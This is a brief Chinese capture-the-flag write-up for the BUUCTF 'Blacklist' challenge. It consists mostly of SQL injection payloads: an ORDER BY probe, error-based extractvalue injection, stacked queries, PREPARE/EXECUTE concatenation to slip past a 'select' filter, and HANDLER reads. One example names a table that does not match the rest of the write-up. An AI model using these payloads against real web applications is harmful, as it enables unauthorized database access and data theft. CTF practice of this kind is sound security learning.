?inject=1' order by 2--+

過濾了很多關鍵詞，就有select，好像繞不過

試試報錯注入

?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+

數據庫：surpersqli?

?因為過濾了太多，報錯注入不了，只能試試別的了

堆疊注入

?inject=-1';use supersqli;show tables--+

查出兩個表：FlagHere,words?

?接下來查字段：flag,varchar(100),NO

?inject=-1';use supersqli;show columns from FlagHere--+

?然后也可以繼續用堆疊注入，對select進行拼接就行，但是我有點不大會，大概就像下面這樣的

1';use supersqli;set @sql=concat('s','elect `flag` from `1919810931114514`');PREPARE stmt1 FROM @sql;EXECUTE stmt1;#

還可以用handler讀取（知道表名的前提下）

?inject=1';handler FlagHere open;handler FlagHere read first--+?inject=1';handler FlagHere open hh;handler hh read first--+?inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;//三個都可以，1也可以換成-1

總結

以上是生活随笔為你收集整理的buuctf-Blacklist的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。